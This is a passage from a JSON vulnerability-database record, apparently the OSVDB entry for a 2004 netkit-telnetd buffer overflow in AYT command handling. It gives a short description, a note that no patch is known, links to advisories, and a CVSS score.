netkit-telnetd. The telnet daemon has an error within the processing of AYT (\"Are You There\") commands and may cause an invalid pointer to be freed resulting in a buffer overflow. With a specially crafted request, an attacker may cause a denial of service or potentially execute arbitrary code resulting in a loss of integrity and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in netkit-telnetd. The telnet daemon has an error within the processing of AYT (\"Are You There\") commands and may cause an invalid pointer to be freed resulting in a buffer overflow. With a specially crafted request, an attacker may cause a denial of service or potentially execute arbitrary code resulting in a loss of integrity and/or availability.\n## References:\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-569)\n[Secunia Advisory ID:12741](https://secuniaresearch.flexerasoftware.com/advisories/12741/)\n[Secunia Advisory ID:14750](https://secuniaresearch.flexerasoftware.com/advisories/14750/)\n[Secunia Advisory ID:12608](https://secuniaresearch.flexerasoftware.com/advisories/12608/)\n[Secunia Advisory ID:12864](https://secuniaresearch.flexerasoftware.com/advisories/12864/)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200410-03.xml\nOther Advisory URL: http://www.debian.org/security/2004/dsa-556\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-101-1\nMail List Post: http://www.securityfocus.com/archive/1/375743\nISS X-Force ID: 17540\n[CVE-2004-0911](https://vulners.com/cve/CVE-2004-0911)\n[CVE-2001-0554](https://vulners.com/cve/CVE-2001-0554)\nBugtraq ID: 11313\n", "modified": "2004-10-06T03:48:09", "published": "2004-10-06T03:48:09", "href": "https://vulners.com/osvdb/OSVDB:10531", "id": "OSVDB:10531", "type": "osvdb", "title": "netkit-telnetd AYT Command Memory Handling Overflow", 
"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}